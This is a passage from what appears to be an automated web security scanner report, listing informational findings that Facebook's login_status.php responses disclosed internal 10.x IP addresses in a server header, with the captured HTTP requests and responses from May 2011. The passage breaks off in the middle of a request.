GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd112e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a6981044%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cb143fd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df170b88038%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4ed82f04%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3633d694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df196e1dc9c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f170b88038&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3633d694&relation=parent&transport=postmessage&frame=f196e1dc9c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.136.127
X-Cnection: close
Date: Thu, 05 May 2011 01:09:41 GMT
Content-Length: 0


20.51. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.97.53

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fa8f932c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfad2f30fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25e4f217c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ec0d1538%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6ec71b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26b908f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe0ec0478&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ec0d1538&origin=http%3A%2F%2Faol.sportingnews.com%2Ff26b908f84&relation=parent&transport=postmessage&frame=fe0ec0478
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.97.53
X-Cnection: close
Date: Thu, 05 May 2011 01:05:43 GMT
Content-Length: 0


20.52. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.174.62

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3774ce11%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb1a975c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24f6674c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f72bf184%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d02ce5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff5eb44784%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20b39a2d&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3f72bf184&origin=http%3A%2F%2Faol.sportingnews.com%2Ff5eb44784&relation=parent&transport=postmessage&frame=f20b39a2d
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.62
X-Cnection: close
Date: Thu, 05 May 2011 01:26:27 GMT
Content-Length: 0


20.53. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.219.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32097f3ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df321c4c018%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc9827154%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35f5800f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcc1d454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffba01c8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14976bf7c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f35f5800f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ffba01c8c&relation=parent&transport=postmessage&frame=f14976bf7c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.219.77
X-Cnection: close
Date: Thu, 05 May 2011 01:43:09 GMT
Content-Length: 0


20.54. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.108.53

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbb817a1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f1a5aec8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2035a03e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29123c7a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa8d6ce7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fa61ac14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3016c4188&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f29123c7a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2fa61ac14&relation=parent&transport=postmessage&frame=f3016c4188
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.108.53
X-Cnection: close
Date: Thu, 05 May 2011 01:18:01 GMT
Content-Length: 0


20.55. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.182.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2bf4ba5d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23f7c552c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d20f14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff8b0928c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b3149e5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b920e7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df198b979a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ff8b0928c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b920e7ac&relation=parent&transport=postmessage&frame=f198b979a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.182.35
X-Cnection: close
Date: Thu, 05 May 2011 01:26:37 GMT
Content-Length: 0


20.56. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.148.107

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2614a56f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a680944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df77e565e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3037515f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ee357ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff984030a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1654a5&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3037515f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff984030a8&relation=parent&transport=postmessage&frame=f2d1654a5
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.148.107
X-Cnection: close
Date: Thu, 05 May 2011 02:17:50 GMT
Content-Length: 0


20.57. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.123.103

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ffd69114%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df30a17dee8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18129d944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2874d7494%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11772bc08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2874d7494&origin=http%3A%2F%2Faol.sportingnews.com%2Ff18f5c7244&relation=parent&transport=postmessage&frame=f3a444fa68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.123.103
X-Cnection: close
Date: Thu, 05 May 2011 01:16:48 GMT
Content-Length: 0


20.58. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.204.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df257e02bac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a62c078%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24f18b208%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9850195%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc642f8f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9850195&origin=http%3A%2F%2Faol.sportingnews.com%2Ff827019bc&relation=parent&transport=postmessage&frame=f128e5845c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.204.49
X-Cnection: close
Date: Thu, 05 May 2011 01:36:12 GMT
Content-Length: 0


20.59. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.66.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14ae60cbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d9be3614%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ba76c9f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df789dd148%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252F